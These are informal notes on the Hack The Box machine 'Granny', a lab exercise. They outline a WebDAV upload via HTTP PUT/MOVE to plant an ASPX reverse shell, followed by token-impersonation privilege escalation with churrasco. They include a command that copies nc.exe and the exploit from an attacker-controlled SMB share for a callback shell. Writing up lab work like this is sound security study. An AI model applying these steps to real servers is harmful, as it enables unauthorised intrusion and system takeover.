Granny
Last updated
Was this helpful?
Last updated
Was this helpful?
webdav
http put mthod enabled davtest to see what is being uploaded curl to put txt file curl to move txt file to aspx run aspx to get a rev shell whoami/priv tokenimpersonate to priv esc old box hence churrasco to priv esc smb to file transfer
simple shell misbheaves and exits frequently hence go with meterpreter shell to stablize the shell
what did we learnt here smb file trasnfer se token imperosnate put method move method webdav enum
refer to 0xdf writeup along the way Addons :: What is webdav ? Web Distributed Authoring and Versioning (WebDAV) is an HTTP extension designed to allow people to create and modify web sites using HTTP. It was originally started in 1996, when this didn’t seem like a terrible idea. I don’t see that often on recent HTB machines, but I did come across it in PWK/OSCP. WebDAV is a protocol whose basic functionality includes enabling users to share, copy, move and edit files through a web server. allows webserver to appear as network share more on it here :: Web DAV is on a huge decline
quick SMB server spawn
on attacker
^what name to be given for this share followed by which directory to share? keep file to be shared in this . directory
on target cmd shell
copy \attackerip\sharky\nc.exe . copy \attackerip\sharky\churassco.exe chur.exe
^output filename
churassco
out put of above command goes here ..........
SEImpersonalPrivilege Enabled SEImpersonalPrivilege is one I know to look out for.
For modern boxes, that means a potato exploit (juicy, lonely, rotten). But for 2003, it’s better to start with churrasco.[ if it does not works then move to others ]
we need nc as well on the box for this to work so transfer both of the exes together
Usage::
^ another exe u want to execute follwed by attacker ip and port
get a listenr up n running on attacker
get exe from here ::